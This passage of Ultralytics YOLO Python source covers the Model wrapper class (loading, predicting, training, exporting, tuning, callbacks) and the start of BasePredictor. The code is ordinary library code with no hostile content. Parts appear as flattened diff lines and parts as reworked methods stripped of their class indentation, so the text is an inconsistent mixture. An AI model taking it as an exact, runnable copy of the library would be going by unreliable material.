Can be a file path, URL, PIL image, numpy array, PyTorch + tensor, or a list/tuple of these. + stream (bool): If True, treat the input source as a continuous stream for predictions. + **kwargs (Any): Additional keyword arguments to configure the prediction process. + + Returns: + (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a + Results object. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model("https://ultralytics.com/images/bus.jpg") + >>> for r in results: + ... print(f"Detected {len(r)} objects in image") + """ + return self.predict(source, stream, **kwargs) + + @staticmethod + def is_triton_model(model: str) -> bool: + """ + Checks if the given model string is a Triton Server URL. + + This static method determines whether the provided model string represents a valid Triton Server URL by + parsing its components using urllib.parse.urlsplit(). + + Args: + model (str): The model string to be checked. + + Returns: + (bool): True if the model string is a valid Triton Server URL, False otherwise. + + Examples: + >>> Model.is_triton_model("http://localhost:8000/v2/models/yolov8n") + True + >>> Model.is_triton_model("yolo11n.pt") + False + """ + from urllib.parse import urlsplit + + url = urlsplit(model) + return url.netloc and url.path and url.scheme in {"http", "grpc"} + + @staticmethod + def is_hub_model(model: str) -> bool: + """ + Check if the provided model is an Ultralytics HUB model. + + This static method determines whether the given model string represents a valid Ultralytics HUB model + identifier. + + Args: + model (str): The model string to check. + + Returns: + (bool): True if the model is a valid Ultralytics HUB model, False otherwise. 
def _new(self, cfg: str, task=None, model=None, verbose=False) -> None:
    """
    Build a new model from a YAML configuration file.

    Args:
        cfg (str): Path to the model configuration file in YAML format.
        task (str | None): Task for the model. If falsy, it is guessed from the loaded configuration.
        model (torch.nn.Module | None): Custom model class. If falsy, the class is resolved with
            self._smart_load("model").
        verbose (bool): If True (and RANK is -1), model information is displayed while building.

    Examples:
        >>> model = Model()
        >>> model._new("yolov8n.yaml", task="detect", verbose=True)
    """
    cfg_dict = yaml_model_load(cfg)
    self.cfg = cfg
    self.task = task or guess_model_task(cfg_dict)

    # Resolve the model class only after self.task is known, then build the model
    model_cls = model or self._smart_load("model")
    self.model = model_cls(cfg_dict, verbose=verbose and RANK == -1)
    self.overrides.update(model=self.cfg, task=self.task)

    # Below added to allow export from YAMLs
    combined_args = {**DEFAULT_CFG_DICT, **self.overrides}  # prefer model args over defaults
    self.model.args = combined_args
    self.model.task = self.task
    self.model_name = cfg


def _load(self, weights: str, task=None) -> None:
    """
    Load a model from a weights file.

    '*.pt' files are loaded as PyTorch checkpoints and their stored arguments become the overrides. Any other
    file is kept as a path, with the task taken from the argument or guessed from the file.

    Args:
        weights (str): Path, URL or stem of the model weights to be loaded.
        task (str | None): Task for non-'*.pt' weights. If falsy, it is guessed from the weights.

    Examples:
        >>> model = Model()
        >>> model._load("yolo11n.pt")
        >>> model._load("path/to/weights.pth", task="detect")
    """
    remote_schemes = ("https://", "http://", "rtsp://", "rtmp://", "tcp://")
    if weights.lower().startswith(remote_schemes):
        weights = checks.check_file(weights, download_dir=SETTINGS["weights_dir"])  # download, return local file
    weights = checks.check_model_file_from_stem(weights)  # add suffix, i.e. yolov8n -> yolov8n.pt

    if Path(weights).suffix == ".pt":
        self.model, self.ckpt = attempt_load_one_weight(weights)
        self.task = self.model.args["task"]
        # The same filtered dict is shared by the wrapper overrides and the model args
        ckpt_args = self._reset_ckpt_args(self.model.args)
        self.overrides = ckpt_args
        self.model.args = ckpt_args
        self.ckpt_path = self.model.pt_path
    else:
        weights = checks.check_file(weights)  # runs in all cases, not redundant with above call
        self.model = weights
        self.ckpt = None
        self.task = task or guess_model_task(weights)
        self.ckpt_path = weights

    self.overrides.update(model=weights, task=self.task)
    self.model_name = weights
def _check_is_pytorch_model(self) -> None:
    """
    Ensure the wrapped model is a PyTorch module or a path to a '*.pt' file.

    Raises:
        TypeError: If self.model is neither an nn.Module nor a str/Path with a '.pt' suffix.

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model._check_is_pytorch_model()  # No error raised
        >>> model = Model("yolov8n.onnx")
        >>> model._check_is_pytorch_model()  # Raises TypeError
    """
    candidate = self.model
    if isinstance(candidate, nn.Module):
        return  # in-memory PyTorch module
    if isinstance(candidate, (str, Path)) and Path(candidate).suffix == ".pt":
        return  # path to a PyTorch checkpoint
    raise TypeError(
        f"model='{self.model}' should be a *.pt PyTorch model to run this method, but is a different format. "
        f"PyTorch models can train, val, predict and export, i.e. 'model.train(data=...)', but exported "
        f"formats like ONNX, TensorRT etc. only support 'predict' and 'val' modes, "
        f"i.e. 'yolo predict model=yolov8n.onnx'.\nTo run CUDA or MPS inference please pass the device "
        f"argument directly in your inference command, i.e. 'model.predict(source=..., device=0)'"
    )
def reset_weights(self) -> "Model":
    """
    Re-initialize the model's parameters and make all of them trainable.

    Every module that exposes a 'reset_parameters' method has it called, then 'requires_grad' is enabled on all
    model parameters.

    Returns:
        (Model): The same instance, to allow chaining.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.reset_weights()
    """
    self._check_is_pytorch_model()
    resettable = [module for module in self.model.modules() if hasattr(module, "reset_parameters")]
    for module in resettable:
        module.reset_parameters()
    for param in self.model.parameters():
        param.requires_grad_(True)
    return self


def load(self, weights: Union[str, Path] = "yolo11n.pt") -> "Model":
    """
    Load parameters from the given weights into the current model.

    Args:
        weights (Union[str, Path]): Path to a weights file, or an already loaded weights object. A path is
            remembered in the overrides under 'pretrained' and loaded before being handed to the model.

    Returns:
        (Model): The same instance, to allow chaining.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = Model()
        >>> model.load("yolo11n.pt")
        >>> model.load(Path("path/to/weights.pt"))
    """
    self._check_is_pytorch_model()
    loaded = weights
    if isinstance(weights, (str, Path)):
        self.overrides["pretrained"] = weights  # remember the weights for DDP training
        loaded, self.ckpt = attempt_load_one_weight(weights)
    self.model.load(loaded)
    return self
def save(self, filename: Union[str, Path] = "saved_model.pt") -> None:
    """
    Save the current model state to a file.

    The stored dictionary is the loaded checkpoint (if any) updated with a half-precision copy of the model and
    metadata: date, Ultralytics version, license information and a link to the documentation.

    Args:
        filename (Union[str, Path]): The name of the file to save the model to.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.save("my_model.pt")
    """
    self._check_is_pytorch_model()
    from copy import deepcopy
    from datetime import datetime

    from ultralytics import __version__

    updates = {
        "model": deepcopy(self.model).half() if isinstance(self.model, nn.Module) else self.model,
        "date": datetime.now().isoformat(),
        "version": __version__,
        "license": "AGPL-3.0 License (https://ultralytics.com/license)",
        "docs": "https://docs.ultralytics.com",
    }
    # self.ckpt is None when no checkpoint was loaded (e.g. model built from YAML); '**None' would raise TypeError
    checkpoint = self.ckpt or {}
    torch.save({**checkpoint, **updates}, filename)


def info(self, detailed: bool = False, verbose: bool = True):
    """
    Log or return model information.

    Args:
        detailed (bool): If True, shows detailed information about the model layers and parameters.
        verbose (bool): If True, prints the information.

    Returns:
        The value returned by the underlying model's info() method for the same arguments.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.info()  # Prints model summary
        >>> info_list = model.info(detailed=True, verbose=False)
    """
    self._check_is_pytorch_model()
    return self.model.info(detailed=detailed, verbose=verbose)
def fuse(self):
    """
    Fuse Conv2d and BatchNorm2d layers of the underlying model for optimized inference.

    The work is delegated to the wrapped model's own fuse() method after confirming that the model is a PyTorch
    model.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = Model("yolo11n.pt")
        >>> model.fuse()
    """
    self._check_is_pytorch_model()
    self.model.fuse()


def embed(
    self,
    source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    **kwargs,
) -> list:
    """
    Generate image embeddings for the given source.

    This is a thin wrapper around predict(): when no (truthy) 'embed' layer indices are supplied, the
    second-to-last layer of the model is selected.

    Args:
        source (str | Path | int | List | Tuple | np.ndarray | torch.Tensor): The source of the image for
            generating embeddings.
        stream (bool): If True, predictions are streamed.
        **kwargs (Any): Additional keyword arguments forwarded to predict().

    Returns:
        (List[torch.Tensor]): A list containing the image embeddings.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> image = "https://ultralytics.com/images/bus.jpg"
        >>> embeddings = model.embed(image)
        >>> print(embeddings[0].shape)
    """
    # Fall back to the second-to-last layer if no indices were passed
    kwargs["embed"] = kwargs.get("embed") or [len(self.model.model) - 2]
    return self.predict(source, stream, **kwargs)
def predict(
    self,
    source: Union[str, Path, int, Image.Image, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    predictor=None,
    **kwargs,
) -> List[Results]:
    """
    Run inference on the given source.

    Args:
        source (str | Path | int | PIL.Image | np.ndarray | torch.Tensor | List | Tuple): The source of the
            image(s) to make predictions on. Defaults to ASSETS (with a warning) when None.
        stream (bool): If True, treats the input source as a continuous stream for predictions.
        predictor (BasePredictor | None): Custom predictor class. If falsy, the class is resolved with
            self._smart_load("predictor"). Only used when no predictor has been set up yet.
        **kwargs (Any): Additional keyword arguments for configuring the prediction process.

    Returns:
        (List[ultralytics.engine.results.Results]): A list of prediction results, each encapsulated in a
            Results object.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.predict(source="path/to/image.jpg", conf=0.25)
        >>> for r in results:
        ...     print(r.boxes.data)  # print detection bounding boxes

    Notes:
        - Argument priority (lowest to highest): model overrides, method defaults, user kwargs.
        - An existing predictor is reused; only its arguments (and save directory, if 'project' or 'name' is
          given) are refreshed.
        - For SAM-type models, 'prompts' can be passed as a keyword argument.
    """
    if source is None:
        source = ASSETS
        LOGGER.warning(f"WARNING ⚠️ 'source' is missing. Using 'source={source}'.")

    # CLI detection: launched through the 'yolo'/'ultralytics' executable in predict or track mode
    launched_by_cli = ARGV[0].endswith(("yolo", "ultralytics"))
    cli_modes = ("predict", "track", "mode=predict", "mode=track")
    is_cli = launched_by_cli and any(token in ARGV for token in cli_modes)

    method_defaults = {"conf": 0.25, "batch": 1, "save": is_cli, "mode": "predict"}
    args = {**self.overrides, **method_defaults, **kwargs}  # highest priority args on the right
    prompts = args.pop("prompts", None)  # for SAM-type models

    if not self.predictor:
        predictor_cls = predictor or self._smart_load("predictor")
        self.predictor = predictor_cls(overrides=args, _callbacks=self.callbacks)
        self.predictor.setup_model(model=self.model, verbose=is_cli)
    else:
        # Predictor is already set up: only refresh its arguments
        self.predictor.args = get_cfg(self.predictor.args, args)
        if "project" in args or "name" in args:
            self.predictor.save_dir = get_save_dir(self.predictor.args)

    if prompts and hasattr(self.predictor, "set_prompts"):  # for SAM-type models
        self.predictor.set_prompts(prompts)

    if is_cli:
        return self.predictor.predict_cli(source=source)
    return self.predictor(source=source, stream=stream)
def track(
    self,
    source: Union[str, Path, int, list, tuple, np.ndarray, torch.Tensor] = None,
    stream: bool = False,
    persist: bool = False,
    **kwargs,
) -> List[Results]:
    """
    Run object tracking on the given source.

    Trackers are registered on first use (when the current predictor has no 'trackers' attribute), then the
    call is forwarded to predict() in 'track' mode.

    Args:
        source (Union[str, Path, int, List, Tuple, np.ndarray, torch.Tensor], optional): Input source for object
            tracking.
        stream (bool): If True, treats the input source as a continuous video stream. Defaults to False.
        persist (bool): Passed to register_tracker when trackers are registered. Defaults to False.
        **kwargs (Any): Additional keyword arguments for configuring the tracking process.

    Returns:
        (List[ultralytics.engine.results.Results]): A list of tracking results, each a Results object.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.track(source="path/to/video.mp4", show=True)
        >>> for r in results:
        ...     print(r.boxes.id)  # print tracking IDs

    Notes:
        - A missing or falsy 'conf' becomes 0.1 and a missing or falsy 'batch' becomes 1.
        - 'mode' is always set to 'track', overriding any user-supplied value.
    """
    if not hasattr(self.predictor, "trackers"):
        from ultralytics.trackers import register_tracker

        register_tracker(self, persist)

    tracking_args = {
        **kwargs,
        "conf": kwargs.get("conf") or 0.1,  # ByteTrack-based method needs low confidence predictions as input
        "batch": kwargs.get("batch") or 1,  # batch-size 1 for tracking in videos
        "mode": "track",
    }
    return self.predict(source=source, stream=stream, **tracking_args)
def val(
    self,
    validator=None,
    **kwargs,
):
    """
    Validate the model and store the resulting metrics on the instance.

    Args:
        validator (ultralytics.engine.validator.BaseValidator | None): Custom validator class. If falsy, the
            class is resolved with self._smart_load("validator").
        **kwargs (Any): Arbitrary keyword arguments for customizing the validation process.

    Returns:
        Validation metrics taken from the validator after it has run; also stored in self.metrics.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.val(data="coco8.yaml", imgsz=640)
        >>> print(results.box.map)  # Print mAP50-95

    Notes:
        - Argument priority (lowest to highest): model overrides, method default 'rect=True', user kwargs.
        - 'mode' is always forced to 'val'.
    """
    merged_args = {**self.overrides, "rect": True, **kwargs, "mode": "val"}  # highest priority on the right
    validator_cls = validator or self._smart_load("validator")
    runner = validator_cls(args=merged_args, _callbacks=self.callbacks)
    runner(model=self.model)
    self.metrics = runner.metrics
    return runner.metrics


def benchmark(
    self,
    **kwargs,
):
    """
    Benchmark the model across export formats using ultralytics.utils.benchmarks.benchmark.

    Args:
        **kwargs (Any): Arbitrary keyword arguments to customize the benchmarking process. Read by this method:
            - data (str): Dataset for benchmarking; None is forwarded when it is not given.
            - imgsz (int | List[int]): Image size for benchmarking.
            - half (bool): Whether to use half-precision (FP16) mode.
            - int8 (bool): Whether to use int8 precision mode.
            - device (str): Device to run the benchmark on (e.g., 'cpu', 'cuda').
            - verbose: Forwarded as given; None is forwarded when it is not given.

    Returns:
        The value returned by the benchmark function.

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.benchmark(data="coco8.yaml", imgsz=640, half=True)
        >>> print(results)
    """
    self._check_is_pytorch_model()
    from ultralytics.utils.benchmarks import benchmark

    method_defaults = {"verbose": False}
    args = {**DEFAULT_CFG_DICT, **self.model.args, **method_defaults, **kwargs, "mode": "benchmark"}
    forwarded = {name: args[name] for name in ("imgsz", "half", "int8", "device")}
    # NOTE(review): 'data' and 'verbose' are read from kwargs directly, so the merged defaults are not used for them
    return benchmark(
        model=self,
        data=kwargs.get("data"),  # if no 'data' argument passed set data=None for default datasets
        verbose=kwargs.get("verbose"),
        **forwarded,
    )
def export(
    self,
    **kwargs,
) -> str:
    """
    Export the model to another format using the Exporter class.

    Args:
        **kwargs (Dict): Arbitrary keyword arguments to customize the export process. These are combined with
            the model's overrides and the method defaults. Common arguments include:
            format (str): Export format (e.g., 'onnx', 'engine', 'coreml').
            half (bool): Export model in half-precision.
            int8 (bool): Export model in int8 precision.
            device (str): Device to run the export on.
            workspace (int): Maximum memory workspace size for TensorRT engines.
            nms (bool): Add Non-Maximum Suppression (NMS) module to model.
            simplify (bool): Simplify ONNX model.

    Returns:
        (str): The value returned by the Exporter call (path to the exported model file).

    Raises:
        TypeError: If the model is not a PyTorch model (raised by _check_is_pytorch_model).

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.export(format="onnx", dynamic=True, simplify=True)
        'path/to/exported/model.onnx'

    Notes:
        - Argument priority (lowest to highest): model overrides, method defaults, user kwargs.
        - 'mode' is always forced to 'export'.
    """
    self._check_is_pytorch_model()
    from .exporter import Exporter

    method_defaults = dict(
        imgsz=self.model.args["imgsz"],
        batch=1,
        data=None,
        device=None,  # reset to avoid multi-GPU errors
        verbose=False,
    )
    export_args = {**self.overrides, **method_defaults, **kwargs, "mode": "export"}  # highest priority on the right
    exporter = Exporter(overrides=export_args, _callbacks=self.callbacks)
    return exporter(model=self.model)
def train(
    self,
    trainer=None,
    **kwargs,
):
    """
    Trains the model using the specified dataset and training configuration.

    The method builds the training arguments, instantiates a trainer, runs it, and then reloads the resulting
    checkpoint into this object.

    When an Ultralytics HUB session with a loaded model is attached, the HUB training arguments replace any
    locally supplied keyword arguments (a warning is logged if local arguments were given). Otherwise the
    arguments are layered, from lowest to highest priority: the base overrides (loaded from the YAML file named
    by 'cfg' when given, else self.overrides), this method's defaults ('data', 'model', 'task'), and the
    user-supplied keyword arguments.

    Args:
        trainer (type | None): Custom trainer class. It is called as trainer(overrides=..., _callbacks=...) to
            build the trainer. If None, the trainer registered for the current task is used.
        **kwargs (Any): Arbitrary keyword arguments for training configuration. Common options include:
            data (str): Path to dataset configuration file.
            epochs (int): Number of training epochs.
            batch (int): Batch size for training.
            imgsz (int): Input image size.
            device (str): Device to run training on (e.g., 'cuda', 'cpu').
            workers (int): Number of worker threads for data loading.
            optimizer (str): Optimizer to use for training.
            lr0 (float): Initial learning rate.
            patience (int): Epochs to wait for no observable improvement for early stopping of training.
            cfg (str): YAML file whose contents replace self.overrides as the base configuration.
            resume (bool): If truthy, training resumes from self.ckpt_path.

    Returns:
        The current value of self.metrics. On ranks -1 and 0 this is refreshed from the trainer's validator
        (None if the validator exposes no 'metrics' attribute); on other ranks it is left unchanged.

    Raises:
        Whatever self._check_is_pytorch_model() raises when the wrapped model is not a PyTorch model.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> results = model.train(data="coco8.yaml", epochs=3)
    """
    self._check_is_pytorch_model()
    if hasattr(self.session, "model") and self.session.model.id:  # Ultralytics HUB session with loaded model
        if kwargs:  # any local argument at all triggers the warning
            LOGGER.warning("WARNING ⚠️ using HUB training arguments, ignoring local training arguments.")
        kwargs = self.session.train_args  # overwrite kwargs

    checks.check_pip_update_available()

    # A user-supplied 'cfg' YAML replaces the stored overrides as the base layer
    overrides = yaml_load(checks.check_yaml(kwargs["cfg"])) if kwargs.get("cfg") else self.overrides
    custom = {
        # NOTE: handle the case when 'cfg' includes 'data'.
        "data": overrides.get("data") or DEFAULT_CFG_DICT["data"] or TASK2DATA[self.task],
        "model": self.overrides["model"],
        "task": self.task,
    }  # method defaults
    args = {**overrides, **custom, **kwargs, "mode": "train"}  # highest priority args on the right
    if args.get("resume"):
        args["resume"] = self.ckpt_path  # replace the truthy flag with the checkpoint path

    self.trainer = (trainer or self._smart_load("trainer"))(overrides=args, _callbacks=self.callbacks)
    if not args.get("resume"):  # manually set model only if not resuming
        self.trainer.model = self.trainer.get_model(weights=self.model if self.ckpt else None, cfg=self.model.yaml)
        self.model = self.trainer.model

    self.trainer.hub_session = self.session  # attach optional HUB session
    self.trainer.train()
    # Update model and cfg after training
    if RANK in {-1, 0}:
        ckpt = self.trainer.best if self.trainer.best.exists() else self.trainer.last
        self.model, _ = attempt_load_one_weight(ckpt)
        self.overrides = self.model.args
        self.metrics = getattr(self.trainer.validator, "metrics", None)  # TODO: no metrics returned by DDP
    return self.metrics
+ When Ray Tune is enabled, it leverages the 'run_ray_tune' function from the ultralytics.utils.tuner module. + Otherwise, it uses the internal 'Tuner' class for tuning. The method combines default, overridden, and + custom arguments to configure the tuning process. + + Args: + use_ray (bool): If True, uses Ray Tune for hyperparameter tuning. Defaults to False. + iterations (int): The number of tuning iterations to perform. Defaults to 10. + *args (List): Variable length argument list for additional arguments. + **kwargs (Dict): Arbitrary keyword arguments. These are combined with the model's overrides and defaults. + + Returns: + (Dict): A dictionary containing the results of the hyperparameter search. + + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> results = model.tune(use_ray=True, iterations=20) + >>> print(results) + """ + self._check_is_pytorch_model() + if use_ray: + from ultralytics.utils.tuner import run_ray_tune + + return run_ray_tune(self, max_samples=iterations, *args, **kwargs) + else: + from .tuner import Tuner + + custom = {} # method defaults + args = {**self.overrides, **custom, **kwargs, "mode": "train"} # highest priority args on the right + return Tuner(args=args, _callbacks=self.callbacks)(model=self, iterations=iterations) + + def _apply(self, fn) -> "Model": + """ + Applies a function to model tensors that are not parameters or registered buffers. + + This method extends the functionality of the parent class's _apply method by additionally resetting the + predictor and updating the device in the model's overrides. It's typically used for operations like + moving the model to a different device or changing its precision. + + Args: + fn (Callable): A function to be applied to the model's tensors. This is typically a method like + to(), cpu(), cuda(), half(), or float(). + + Returns: + (Model): The model instance with the function applied and updated attributes. 
+ + Raises: + AssertionError: If the model is not a PyTorch model. + + Examples: + >>> model = Model("yolo11n.pt") + >>> model = model._apply(lambda t: t.cuda()) # Move model to GPU + """ + self._check_is_pytorch_model() + self = super()._apply(fn) # noqa + self.predictor = None # reset predictor as device may have changed + self.overrides["device"] = self.device # was str(self.device) i.e. device(type='cuda', index=0) -> 'cuda:0' + return self + + @property + def names(self) -> Dict[int, str]: + """ + Retrieves the class names associated with the loaded model. + + This property returns the class names if they are defined in the model. It checks the class names for validity + using the 'check_class_names' function from the ultralytics.nn.autobackend module. If the predictor is not + initialized, it sets it up before retrieving the names. + + Returns: + (Dict[int, str]): A dict of class names associated with the model. + + Raises: + AttributeError: If the model or predictor does not have a 'names' attribute. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.names) + {0: 'person', 1: 'bicycle', 2: 'car', ...} + """ + from ultralytics.nn.autobackend import check_class_names + + if hasattr(self.model, "names"): + return check_class_names(self.model.names) + if not self.predictor: # export formats will not have predictor defined until predict() is called + self.predictor = self._smart_load("predictor")(overrides=self.overrides, _callbacks=self.callbacks) + self.predictor.setup_model(model=self.model, verbose=False) + return self.predictor.model.names + + @property + def device(self) -> torch.device: + """ + Retrieves the device on which the model's parameters are allocated. + + This property determines the device (CPU or GPU) where the model's parameters are currently stored. It is + applicable only to models that are instances of nn.Module. + + Returns: + (torch.device): The device (CPU/GPU) of the model. 
+ + Raises: + AttributeError: If the model is not a PyTorch nn.Module instance. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.device) + device(type='cuda', index=0) # if CUDA is available + >>> model = model.to("cpu") + >>> print(model.device) + device(type='cpu') + """ + return next(self.model.parameters()).device if isinstance(self.model, nn.Module) else None + + @property + def transforms(self): + """ + Retrieves the transformations applied to the input data of the loaded model. + + This property returns the transformations if they are defined in the model. The transforms + typically include preprocessing steps like resizing, normalization, and data augmentation + that are applied to input data before it is fed into the model. + + Returns: + (object | None): The transform object of the model if available, otherwise None. + + Examples: + >>> model = YOLO("yolo11n.pt") + >>> transforms = model.transforms + >>> if transforms: + ... print(f"Model transforms: {transforms}") + ... else: + ... print("No transforms defined for this model.") + """ + return self.model.transforms if hasattr(self.model, "transforms") else None + + def add_callback(self, event: str, func) -> None: + """ + Adds a callback function for a specified event. + + This method allows registering custom callback functions that are triggered on specific events during + model operations such as training or inference. Callbacks provide a way to extend and customize the + behavior of the model at various stages of its lifecycle. + + Args: + event (str): The name of the event to attach the callback to. Must be a valid event name recognized + by the Ultralytics framework. + func (Callable): The callback function to be registered. This function will be called when the + specified event occurs. + + Raises: + ValueError: If the event name is not recognized or is invalid. + + Examples: + >>> def on_train_start(trainer): + ... 
def clear_callback(self, event: str) -> None:
    """
    Removes every callback registered for one event.

    The entry for `event` in self.callbacks is replaced with a new empty list, so nothing is left registered
    for that event until callbacks are added again. Callbacks of other events are untouched.

    Args:
        event (str): Name of the event whose callback list should be emptied.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.add_callback("on_train_start", lambda: print("Training started"))
        >>> model.clear_callback("on_train_start")
        >>> # All callbacks for 'on_train_start' are now removed

    Notes:
        - Everything stored under the event is dropped, not only callbacks added by the user.
        - Use with caution: callbacks that other operations rely on are removed as well.
    """
    self.callbacks[event] = list()
def _smart_load(self, key: str):
    """
    Looks up the class registered for `key` under the model's current task.

    The lookup is self.task_map[self.task][key]. Any failure during that lookup is converted into a
    NotImplementedError whose message names the model class, the calling method (used as the "mode") and
    the task.

    Args:
        key (str): Entry to fetch from the task's mapping, e.g. 'model', 'trainer', 'validator' or 'predictor'.

    Returns:
        (object): Whatever is stored in the task map for the current task and the given key.

    Raises:
        NotImplementedError: If the lookup fails for any reason; the original error is chained as the cause.

    Examples:
        >>> model = Model(task="detect")
        >>> predictor = model._smart_load("predictor")
        >>> trainer = model._smart_load("trainer")

    Notes:
        - The "mode" in the error message is the name of the function that called this method, taken from
          the call stack.
    """
    try:
        modules_for_task = self.task_map[self.task]
        return modules_for_task[key]
    except Exception as e:
        caller = inspect.stack()[1][3]  # name of the function that asked for the module
        cls_name = self.__class__.__name__
        message = emojis(f"WARNING ⚠️ '{cls_name}' model does not support '{caller}' mode for '{self.task}' task yet.")
        raise NotImplementedError(message) from e
def eval(self):
    """
    Switches the wrapped model to evaluation mode.

    The call is forwarded to self.model.eval(); this wrapper is then returned so calls can be chained.

    Returns:
        (Model): This instance, after the underlying model's eval() has been called.

    Examples:
        >>> model = YOLO("yolo11n.pt")
        >>> model.eval()
    """
    wrapped = self.model
    wrapped.eval()
    return self
+ + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.41/engine/predictor.py b/2024.ultralytics/v8.3.41/engine/predictor.py new file mode 100644 index 0000000..c28e189 --- /dev/null +++ b/2024.ultralytics/v8.3.41/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from 
class BasePredictor:
    """
    Base class for predictors.

    Drives the inference loop: it loads a model, builds a dataset from a source, then for every batch runs
    preprocess -> inference -> postprocess and optionally prints, displays and saves the results. Subclasses
    typically override `postprocess` (which is a pass-through here).

    Attributes:
        args (SimpleNamespace): Configuration for the predictor.
        save_dir (Path): Directory to save results.
        done_warmup (bool): Whether model warmup has already been run.
        model (nn.Module): Model used for prediction.
        data (dict): Data configuration.
        device (torch.device): Device used for prediction.
        dataset (Dataset): Dataset used for prediction.
        vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output.
    """

    def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None):
        """
        Initializes the BasePredictor class.

        Args:
            cfg (str, optional): Configuration passed to get_cfg. Defaults to DEFAULT_CFG.
            overrides (dict, optional): Configuration overrides. Defaults to None.
            _callbacks (dict, optional): Event-name -> list-of-callables mapping. The default callbacks are
                used when this is None or empty.
        """
        self.args = get_cfg(cfg, overrides)
        self.save_dir = get_save_dir(self.args)
        if self.args.conf is None:
            self.args.conf = 0.25  # default conf=0.25
        self.done_warmup = False
        if self.args.show:
            self.args.show = check_imshow(warn=True)

        # Usable if setup is done
        self.model = None
        self.data = self.args.data  # data_dict
        self.imgsz = None
        self.device = None
        self.dataset = None
        self.vid_writer = {}  # dict of {save_path: video_writer, ...}
        self.plotted_img = None
        self.source_type = None
        self.seen = 0
        self.windows = []
        self.batch = None
        self.results = None
        self.transforms = None
        self.callbacks = _callbacks or callbacks.get_default_callbacks()
        self.txt_path = None
        self._lock = threading.Lock()  # for automatic thread-safe inference
        callbacks.add_integration_callbacks(self)

    def preprocess(self, im):
        """
        Prepares input image before inference.

        Non-tensor input is run through `pre_transform`, stacked, channel-reversed, transposed to BCHW and
        scaled to 0.0 - 1.0. Tensor input is only moved to the device and cast; it is not rescaled.

        Args:
            im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list.

        Returns:
            (torch.Tensor): Tensor on self.device, fp16 if self.model.fp16 else fp32.
        """
        not_tensor = not isinstance(im, torch.Tensor)
        if not_tensor:
            im = np.stack(self.pre_transform(im))
            im = im[..., ::-1].transpose((0, 3, 1, 2))  # BGR to RGB, BHWC to BCHW, (n, 3, h, w)
            im = np.ascontiguousarray(im)  # contiguous
            im = torch.from_numpy(im)

        im = im.to(self.device)
        im = im.half() if self.model.fp16 else im.float()  # uint8 to fp16/32
        if not_tensor:
            im /= 255  # 0 - 255 to 0.0 - 1.0
        return im

    def inference(self, im, *args, **kwargs):
        """
        Runs inference on a given image using the specified model and arguments.

        When `args.visualize` is set and the source is not a tensor, a visualization directory named after
        the first path of the current batch is created under save_dir and passed to the model.
        """
        visualize = (
            increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True)
            if self.args.visualize and (not self.source_type.tensor)
            else False
        )
        return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs)

    def pre_transform(self, im):
        """
        Pre-transform input image before inference.

        Args:
            im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list.

        Returns:
